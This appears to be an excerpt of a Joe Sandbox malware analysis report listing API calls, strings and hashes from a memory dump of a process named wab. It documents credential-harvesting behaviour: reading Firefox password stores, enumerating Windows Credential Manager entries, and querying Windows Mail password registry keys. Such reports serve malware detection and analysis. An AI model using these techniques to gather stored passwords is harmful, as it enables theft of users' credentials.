                                                                                                                                                • Instruction Fuzzy Hash: 5E31E7B2805324BEFB14EA54DD42EDEB76CAF11354F20415FF214A2182DBBC9ED48A9D
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000005.00000002.1155967863.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memsetsprintf$_mbscpy$FileWrite_mbscatstrlen
                                                                                                                                                • String ID: bgcolor="%s"$ nowrap$&nbsp;$</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
                                                                                                                                                • API String ID: 710961058-601624466
                                                                                                                                                • Opcode ID: 6b5a2a585f50ca3eac413cecb2812d02d42192bb924b4e36303969acff340374
                                                                                                                                                • Instruction ID: 74eb9a4e80b6148bc8e6745fd37c56fddd23ac0c0a2d0b32ddfd32f18a43723b
                                                                                                                                                • Opcode Fuzzy Hash: 6b5a2a585f50ca3eac413cecb2812d02d42192bb924b4e36303969acff340374
                                                                                                                                                • Instruction Fuzzy Hash: BC61B232900214AFEF14EF64CC81EDE7B79EF05314F10419AF905AB1D2DB749A55CB55
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000005.00000002.1155967863.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: sprintf$memset$_mbscpy
                                                                                                                                                • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                                                                                                                                • API String ID: 3402215030-3842416460
                                                                                                                                                • Opcode ID: 17ed6d14846e4c5c10a4de3d65ab3a3dc687bb0adce687871bc2f7fa502a4f2e
                                                                                                                                                • Instruction ID: 369df5ceca9bdb9f61db2c44a96b4e719fee50907ea6fa1c749cf0cc9e3d70a7
                                                                                                                                                • Opcode Fuzzy Hash: 17ed6d14846e4c5c10a4de3d65ab3a3dc687bb0adce687871bc2f7fa502a4f2e
                                                                                                                                                • Instruction Fuzzy Hash: CC4176B684011DAEEB11EE54DC41FEB776CAF55305F0401EBB608E2142E7789F988FA9
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000005.00000002.1155967863.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memcmp$memcpy
                                                                                                                                                • String ID: %s mode not allowed: %s$BINARY$access$cache$file:$invalid uri authority: %.*s$localhost$mode$no such %s mode: %s$no such vfs: %s$vfs
                                                                                                                                                • API String ID: 231171946-1411472696
                                                                                                                                                • Opcode ID: ee0957bba9a21b500f81e6c25a2f981e0bf1c959c719be955f11db3b2c6e13f4
                                                                                                                                                • Instruction ID: 52e3131474fa5b42b7a716d11f9a5693575ad96a685679239bae0d8a086cc604
                                                                                                                                                • Opcode Fuzzy Hash: ee0957bba9a21b500f81e6c25a2f981e0bf1c959c719be955f11db3b2c6e13f4
                                                                                                                                                • Instruction Fuzzy Hash: 6ED13571D40209AAFF24CF99C8807EFBBB1AF15349F24405FE84197361E3789AC68B59
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000005.00000002.1155967863.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: _mbscpy$FileModuleNamePlacementWindow_mbscatmemsetstrrchr
                                                                                                                                                • String ID: .cfg$AddExportHeaderLine$General$MarkOddEvenRows$SaveFilterIndex$ShowGridLines$WinPos$lD
                                                                                                                                                • API String ID: 1012775001-1916105108
                                                                                                                                                • Opcode ID: 122b63003726a974bfadc130288c83bc1cbd12b8fd6105304b92718d22d06189
                                                                                                                                                • Instruction ID: 0f0ca2c9629047d536013ad0a00a476c63862c7e4230734d296e8a5f64e20069
                                                                                                                                                • Opcode Fuzzy Hash: 122b63003726a974bfadc130288c83bc1cbd12b8fd6105304b92718d22d06189
                                                                                                                                                • Instruction Fuzzy Hash: 41415A72940118ABDB20DB54CC88FDAB7BCAB59300F4541EAF50DE7192DA74AA858FA4
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 004078B8: GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040EAAB,?,?,?,?), ref: 004078D1
                                                                                                                                                  • Part of subcall function 004078B8: CloseHandle.KERNEL32(00000000,?,?,?), ref: 004078FD
                                                                                                                                                  • Part of subcall function 004045BD: ??3@YAXPAX@Z.MSVCRT ref: 004045C4
                                                                                                                                                  • Part of subcall function 00406DD3: _mbscpy.MSVCRT ref: 00406DD8
                                                                                                                                                  • Part of subcall function 00406DD3: strrchr.MSVCRT ref: 00406DE0
                                                                                                                                                  • Part of subcall function 0040D7EA: memset.MSVCRT ref: 0040D80B
                                                                                                                                                  • Part of subcall function 0040D7EA: memset.MSVCRT ref: 0040D81F
                                                                                                                                                  • Part of subcall function 0040D7EA: memset.MSVCRT ref: 0040D833
                                                                                                                                                  • Part of subcall function 0040D7EA: memcpy.MSVCRT ref: 0040D900
                                                                                                                                                  • Part of subcall function 0040D7EA: memcpy.MSVCRT ref: 0040D960
                                                                                                                                                • strlen.MSVCRT ref: 0040EAF0
                                                                                                                                                • strlen.MSVCRT ref: 0040EAFE
                                                                                                                                                • memset.MSVCRT ref: 0040EB3F
                                                                                                                                                • strlen.MSVCRT ref: 0040EB4E
                                                                                                                                                • strlen.MSVCRT ref: 0040EB5C
                                                                                                                                                • memset.MSVCRT ref: 0040EB9D
                                                                                                                                                • strlen.MSVCRT ref: 0040EBAC
                                                                                                                                                • strlen.MSVCRT ref: 0040EBBA
                                                                                                                                                • _strcmpi.MSVCRT ref: 0040EC68
                                                                                                                                                • _mbscpy.MSVCRT ref: 0040EC83
                                                                                                                                                  • Part of subcall function 00406E81: _mbscpy.MSVCRT ref: 00406E89
                                                                                                                                                  • Part of subcall function 00406E81: _mbscat.MSVCRT ref: 00406E98
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000005.00000002.1155967863.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: strlen$memset$_mbscpy$memcpy$??3@CloseFileHandleSize_mbscat_strcmpistrrchr
                                                                                                                                                • String ID: logins.json$none$signons.sqlite$signons.txt
                                                                                                                                                • API String ID: 3884059725-3138536805
                                                                                                                                                • Opcode ID: c5b9952702cbd755305f6f4c2c58a42ef73f51976a5d7d3736a15114e020422c
                                                                                                                                                • Instruction ID: df88ffc6541641ac30fc10f5b0fca58fec5c07c4b1c9a15943a758993f488c50
                                                                                                                                                • Opcode Fuzzy Hash: c5b9952702cbd755305f6f4c2c58a42ef73f51976a5d7d3736a15114e020422c
                                                                                                                                                • Instruction Fuzzy Hash: 2D512971508209AEE714EB62DC85BDAB7ECAF11305F10057BE145E20C2EF79B6648B99
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000005.00000002.1155967863.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: _strcmpi
                                                                                                                                                • String ID: /scomma$/shtml$/skeepass$/stab$/stabular$/sverhtml$/sxml
                                                                                                                                                • API String ID: 1439213657-1959339147
                                                                                                                                                • Opcode ID: 77925ccb47b99d7184ab421125f296c84d7d33a23461460fa00f3fd3e52541e8
                                                                                                                                                • Instruction ID: 4795e8c1a20e30d0c9bbc9b6431cc8fe1bf434ed6b151c21ba544f3180274443
                                                                                                                                                • Opcode Fuzzy Hash: 77925ccb47b99d7184ab421125f296c84d7d33a23461460fa00f3fd3e52541e8
                                                                                                                                                • Instruction Fuzzy Hash: 89012C6328A71168F93822A63C07F931A88CBD2B3BF32021FFA04E40C4EE5D9014946E
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • memset.MSVCRT ref: 00443AF6
                                                                                                                                                  • Part of subcall function 00443946: strlen.MSVCRT ref: 00443953
                                                                                                                                                • strlen.MSVCRT ref: 00443B12
                                                                                                                                                • memset.MSVCRT ref: 00443B4C
                                                                                                                                                • memset.MSVCRT ref: 00443B60
                                                                                                                                                • memset.MSVCRT ref: 00443B74
                                                                                                                                                • memset.MSVCRT ref: 00443B9A
                                                                                                                                                  • Part of subcall function 0040CF27: memcpy.MSVCRT ref: 0040CFB8
                                                                                                                                                  • Part of subcall function 0040CFC5: memset.MSVCRT ref: 0040CFE4
                                                                                                                                                  • Part of subcall function 0040CFC5: memset.MSVCRT ref: 0040CFFA
                                                                                                                                                  • Part of subcall function 0040CFC5: memcpy.MSVCRT ref: 0040D031
                                                                                                                                                  • Part of subcall function 0040CFC5: memset.MSVCRT ref: 0040D03B
                                                                                                                                                • memcpy.MSVCRT ref: 00443BD1
                                                                                                                                                  • Part of subcall function 0040CF27: memcpy.MSVCRT ref: 0040CF6A
                                                                                                                                                  • Part of subcall function 0040CF27: memcpy.MSVCRT ref: 0040CF94
                                                                                                                                                  • Part of subcall function 0040CFC5: memset.MSVCRT ref: 0040D00C
                                                                                                                                                • memcpy.MSVCRT ref: 00443C0D
                                                                                                                                                • memcpy.MSVCRT ref: 00443C1F
                                                                                                                                                • _mbscpy.MSVCRT ref: 00443CF6
                                                                                                                                                • memcpy.MSVCRT ref: 00443D27
                                                                                                                                                • memcpy.MSVCRT ref: 00443D39
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000005.00000002.1155967863.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memcpymemset$strlen$_mbscpy
                                                                                                                                                • String ID: salu
                                                                                                                                                • API String ID: 3691931180-4177317985
                                                                                                                                                • Opcode ID: cfd6af14ea326c76b81993dcf2b8da589751f80de7e5c424798678831997877e
                                                                                                                                                • Instruction ID: ac1bd25895dca9443f5d295c1451dfd6054ecd25aeec11951aea85171a240119
                                                                                                                                                • Opcode Fuzzy Hash: cfd6af14ea326c76b81993dcf2b8da589751f80de7e5c424798678831997877e
                                                                                                                                                • Instruction Fuzzy Hash: E1715F7290011DAADB10EFA5CC81ADEB7BDBF08348F1405BAF648E7191DB749B488F95
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • LoadLibraryA.KERNEL32(psapi.dll,?,0040F791), ref: 0040F9BF
                                                                                                                                                • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameA), ref: 0040F9D8
                                                                                                                                                • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 0040F9E9
                                                                                                                                                • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExA), ref: 0040F9FA
                                                                                                                                                • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 0040FA0B
                                                                                                                                                • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 0040FA1C
                                                                                                                                                • FreeLibrary.KERNEL32(00000000), ref: 0040FA3C
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000005.00000002.1155967863.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: AddressProc$Library$FreeLoad
                                                                                                                                                • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameA$GetModuleFileNameExA$GetModuleInformation$psapi.dll
                                                                                                                                                • API String ID: 2449869053-232097475
                                                                                                                                                • Opcode ID: 41a7431a570a879339345957c21e7bbc60c6881d878c9e33f6f290671b5569e0
                                                                                                                                                • Instruction ID: b0622ab91b6b15bab8cd8e6e0f6310f6235a52dd738245c008a901a401bb443a
                                                                                                                                                • Opcode Fuzzy Hash: 41a7431a570a879339345957c21e7bbc60c6881d878c9e33f6f290671b5569e0
                                                                                                                                                • Instruction Fuzzy Hash: C6017574A41315ABDB31DB256D41F6B2DE49786B41B100037F808F16A5E7B8D806CF6D
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 00404666: _mbscpy.MSVCRT ref: 004046B5
                                                                                                                                                  • Part of subcall function 0040472F: LoadLibraryA.KERNELBASE(?,0040F08A,?,00000000), ref: 00404737
                                                                                                                                                  • Part of subcall function 0040472F: GetProcAddress.KERNEL32(00000000,?), ref: 0040474F
                                                                                                                                                • strlen.MSVCRT ref: 00442FBF
                                                                                                                                                • ??2@YAPAXI@Z.MSVCRT ref: 00442FCF
                                                                                                                                                • memset.MSVCRT ref: 0044301B
                                                                                                                                                • memset.MSVCRT ref: 00443038
                                                                                                                                                • _mbscpy.MSVCRT ref: 00443066
                                                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 004430AA
                                                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,000000FF,00000000,00000000,?,?,?), ref: 004430FB
                                                                                                                                                • LocalFree.KERNEL32(?), ref: 00443110
                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 00443119
                                                                                                                                                  • Part of subcall function 0040710B: strtoul.MSVCRT ref: 00407113
                                                                                                                                                Strings
                                                                                                                                                • Software\Microsoft\Windows Live Mail, xrefs: 0044305A
                                                                                                                                                • Salt, xrefs: 00443094
                                                                                                                                                • Software\Microsoft\Windows Mail, xrefs: 0044304E
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000005.00000002.1155967863.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: _mbscpymemset$??2@??3@AddressByteCharCloseFreeLibraryLoadLocalMultiProcWidestrlenstrtoul
                                                                                                                                                • String ID: Salt$Software\Microsoft\Windows Live Mail$Software\Microsoft\Windows Mail
                                                                                                                                                • API String ID: 665470638-2687544566
                                                                                                                                                • Opcode ID: c7be1d339a6f71acec12681967ad21d50f91be88715435c981d713b1c9f5c6b3
                                                                                                                                                • Instruction ID: f7bf93f0836b67bba3c835e38737b5ae5122e901c23063e01546d75898481f5a
                                                                                                                                                • Opcode Fuzzy Hash: c7be1d339a6f71acec12681967ad21d50f91be88715435c981d713b1c9f5c6b3
                                                                                                                                                • Instruction Fuzzy Hash: F7417676C0411CAEDB11DFE4DC81EDEBBBCAF49314F1441ABE644E3242DA349A44CB69
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 00406AD1: strlen.MSVCRT ref: 00406ADE
                                                                                                                                                  • Part of subcall function 00406AD1: WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,0040A8D9,?,<item>), ref: 00406AEB
                                                                                                                                                • memset.MSVCRT ref: 00403EBB
                                                                                                                                                • memset.MSVCRT ref: 00403ECF
                                                                                                                                                • memset.MSVCRT ref: 00403EE3
                                                                                                                                                • sprintf.MSVCRT ref: 00403F04
                                                                                                                                                • _mbscpy.MSVCRT ref: 00403F20
                                                                                                                                                • sprintf.MSVCRT ref: 00403F57
                                                                                                                                                • sprintf.MSVCRT ref: 00403F88
                                                                                                                                                Strings
                                                                                                                                                • <table dir="rtl"><tr><td>, xrefs: 00403F1A
                                                                                                                                                • <meta http-equiv='content-type' content='text/html;charset=%s'>, xrefs: 00403EFE
                                                                                                                                                • <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">, xrefs: 00403E93
                                                                                                                                                • <br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>, xrefs: 00403F82
                                                                                                                                                • <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>, xrefs: 00403F32
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000005.00000002.1155967863.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memsetsprintf$FileWrite_mbscpystrlen
                                                                                                                                                • String ID: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">$<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>$<html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>$<meta http-equiv='content-type' content='text/html;charset=%s'>$<table dir="rtl"><tr><td>
                                                                                                                                                • API String ID: 113626815-1670831295
                                                                                                                                                • Opcode ID: e988a86f96cb0b35651706e8a54da2f8db7d6407d8c8c481c34fbc63b9ba1f92
                                                                                                                                                • Instruction ID: 806bb3af6c01162091129d7dbd14bcfdd9389eda619bfd821539a1a2e53cd61a
                                                                                                                                                • Opcode Fuzzy Hash: e988a86f96cb0b35651706e8a54da2f8db7d6407d8c8c481c34fbc63b9ba1f92
                                                                                                                                                • Instruction Fuzzy Hash: 553187B2944218BAEB10EB95CC41FDF77ACEB44305F1040ABF609A3141DE789F988B69
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • sprintf.MSVCRT ref: 004092EC
                                                                                                                                                • LoadMenuA.USER32(?,?), ref: 004092FA
                                                                                                                                                  • Part of subcall function 00409123: GetMenuItemCount.USER32(?), ref: 00409138
                                                                                                                                                  • Part of subcall function 00409123: memset.MSVCRT ref: 00409159
                                                                                                                                                  • Part of subcall function 00409123: GetMenuItemInfoA.USER32 ref: 00409194
                                                                                                                                                  • Part of subcall function 00409123: strchr.MSVCRT ref: 004091AB
                                                                                                                                                • DestroyMenu.USER32(00000000), ref: 00409318
                                                                                                                                                • sprintf.MSVCRT ref: 0040935C
                                                                                                                                                • CreateDialogParamA.USER32(?,00000000,00000000,004092C6,00000000), ref: 00409371
                                                                                                                                                • memset.MSVCRT ref: 0040938D
                                                                                                                                                • GetWindowTextA.USER32(00000000,?,00001000), ref: 0040939E
                                                                                                                                                • EnumChildWindows.USER32(00000000,Function_00009213,00000000), ref: 004093C6
                                                                                                                                                • DestroyWindow.USER32(00000000), ref: 004093CD
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000005.00000002.1155967863.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Menu$DestroyItemWindowmemsetsprintf$ChildCountCreateDialogEnumInfoLoadParamTextWindowsstrchr
                                                                                                                                                • String ID: caption$dialog_%d$menu_%d
                                                                                                                                                • API String ID: 3259144588-3822380221
                                                                                                                                                • Opcode ID: 00d5c196fd175f8f7b493892d5fd0a4de6fbafe6eb8e7d8c787b31c60a4e7b89
                                                                                                                                                • Instruction ID: 4880027b7f24484a0daf4b70c4ca19663393d93293db39a52c89ae2e2b3c84be
                                                                                                                                                • Opcode Fuzzy Hash: 00d5c196fd175f8f7b493892d5fd0a4de6fbafe6eb8e7d8c787b31c60a4e7b89
                                                                                                                                                • Instruction Fuzzy Hash: 0121E472500248BBEB21AF509C45EEF3768FB4A715F14007BFE01A11D2D6B85D548F59
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • GetModuleHandleA.KERNEL32(kernel32.dll,?,0040F798), ref: 0040F937
                                                                                                                                                • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 0040F950
                                                                                                                                                • GetProcAddress.KERNEL32(00000000,Module32First), ref: 0040F961
                                                                                                                                                • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 0040F972
                                                                                                                                                • GetProcAddress.KERNEL32(00000000,Process32First), ref: 0040F983
                                                                                                                                                • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 0040F994
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000005.00000002.1155967863.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: AddressProc$HandleModule
                                                                                                                                                • String ID: CreateToolhelp32Snapshot$Module32First$Module32Next$Process32First$Process32Next$kernel32.dll
                                                                                                                                                • API String ID: 667068680-3953557276
                                                                                                                                                • Opcode ID: f969084aaa60d6fc347aca6cd4b103efb280d70b1424ed757b2f63fa67c010da
                                                                                                                                                • Instruction ID: d70ca51da7794723d6fdd3b52e2ca510f6325bc6d96353a7ae51ff6a4d6706bc
                                                                                                                                                • Opcode Fuzzy Hash: f969084aaa60d6fc347aca6cd4b103efb280d70b1424ed757b2f63fa67c010da
                                                                                                                                                • Instruction Fuzzy Hash: E5F03674641716BEE7219B35EC41F6B2DA8B786B817150037E404F1295EBBCD406CBEE
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 00404651: FreeLibrary.KERNEL32(?,004045DE,?,0040F07D,?,00000000), ref: 00404658
                                                                                                                                                • LoadLibraryA.KERNEL32(advapi32.dll,?,0040F07D,?,00000000), ref: 004045E3
                                                                                                                                                • GetProcAddress.KERNEL32(00000000,CredReadA), ref: 004045FC
                                                                                                                                                • GetProcAddress.KERNEL32(?,CredFree), ref: 00404608
                                                                                                                                                • GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404614
                                                                                                                                                • GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404620
                                                                                                                                                • GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 0040462C
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000005.00000002.1155967863.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: AddressProc$Library$FreeLoad
                                                                                                                                                • String ID: CredDeleteA$CredEnumerateA$CredEnumerateW$CredFree$CredReadA$advapi32.dll
                                                                                                                                                • API String ID: 2449869053-4258758744
                                                                                                                                                • Opcode ID: cdcbb80234758e29e10a2fa45a01471a6c512abbbeef489e8d79757fa0f5749b
                                                                                                                                                • Instruction ID: e667573ab02a3a36113e5811d7d9d25958220871e4fc9ad39742c7b975dc30ca
                                                                                                                                                • Opcode Fuzzy Hash: cdcbb80234758e29e10a2fa45a01471a6c512abbbeef489e8d79757fa0f5749b
                                                                                                                                                • Instruction Fuzzy Hash: 32012CB49007009ADB30AF759809B46BAE0EF9A705B224C2FE295A3691E77ED440CF49
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • RegOpenKeyExA.ADVAPI32(0040F591,Creds,00000000,00020019,0040F591,0044FE50,00000040,?,?,0040F591,?,?,?,?), ref: 0040F1A1
                                                                                                                                                • memset.MSVCRT ref: 0040F1BF
                                                                                                                                                • RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 0040F1EC
                                                                                                                                                • RegQueryValueExA.ADVAPI32(?,ps:password,00000000,?), ref: 0040F215
                                                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,000000FF,00000000,00000000), ref: 0040F28E
                                                                                                                                                • LocalFree.KERNEL32(?), ref: 0040F2A1
                                                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 0040F2AC
                                                                                                                                                • RegEnumKeyA.ADVAPI32(?,00000000,?,000000FF), ref: 0040F2C3
                                                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 0040F2D4
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000005.00000002.1155967863.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: CloseOpen$ByteCharEnumFreeLocalMultiQueryValueWidememset
                                                                                                                                                • String ID: Creds$ps:password
                                                                                                                                                • API String ID: 551151806-1872227768
                                                                                                                                                • Opcode ID: 99828ca7f35a41181d9bb96a9a02e43887c925b3765608a693f25377290640c0
                                                                                                                                                • Instruction ID: 6090246ec9a09cf2b7bf1ee2c59d5b558b26d9adbf6fbfd3eb8a6f02fd62f1f0
                                                                                                                                                • Opcode Fuzzy Hash: 99828ca7f35a41181d9bb96a9a02e43887c925b3765608a693f25377290640c0
                                                                                                                                                • Instruction Fuzzy Hash: D7413ABA900209AFDF21DF95DC44EEFBBBCEF49704F0000B6F905E2151DA349A548B64
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • wcsstr.MSVCRT ref: 0040424C
                                                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 00404293
                                                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 004042A7
                                                                                                                                                • _mbscpy.MSVCRT ref: 004042B7
                                                                                                                                                • _mbscpy.MSVCRT ref: 004042CA
                                                                                                                                                • strchr.MSVCRT ref: 004042D8
                                                                                                                                                • strlen.MSVCRT ref: 004042EC
                                                                                                                                                • sprintf.MSVCRT ref: 0040430D
                                                                                                                                                • strchr.MSVCRT ref: 0040431E
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000005.00000002.1155967863.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ByteCharMultiWide_mbscpystrchr$sprintfstrlenwcsstr
                                                                                                                                                • String ID: %s@gmail.com$www.google.com
                                                                                                                                                • API String ID: 3866421160-4070641962
                                                                                                                                                • Opcode ID: 1db7f9bf2b70e86dd11ed3dbd874db975a9752dd457c4b53029e5acecafbc8af
                                                                                                                                                • Instruction ID: 638e790b5603b8fd8804fb5d4b15941c8435a10b684d18614d662d2844f21a3d
                                                                                                                                                • Opcode Fuzzy Hash: 1db7f9bf2b70e86dd11ed3dbd874db975a9752dd457c4b53029e5acecafbc8af
                                                                                                                                                • Instruction Fuzzy Hash: A53195B290421CBFEB11DB91DC81FDAB36CEB44314F1005A7F708F2181DA78AF558A59
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • _mbscpy.MSVCRT ref: 004094BA
                                                                                                                                                • _mbscpy.MSVCRT ref: 004094CA
                                                                                                                                                  • Part of subcall function 0040907D: memset.MSVCRT ref: 004090A2
                                                                                                                                                  • Part of subcall function 0040907D: GetPrivateProfileStringA.KERNEL32(00451308,?,0044551F,?,00001000,00451200), ref: 004090C6
                                                                                                                                                  • Part of subcall function 0040907D: WritePrivateProfileStringA.KERNEL32(00451308,?,?,00451200), ref: 004090DD
                                                                                                                                                • EnumResourceNamesA.KERNEL32(?,00000004,Function_000092CB,00000000), ref: 00409500
                                                                                                                                                • EnumResourceNamesA.KERNEL32(?,00000005,Function_000092CB,00000000), ref: 0040950A
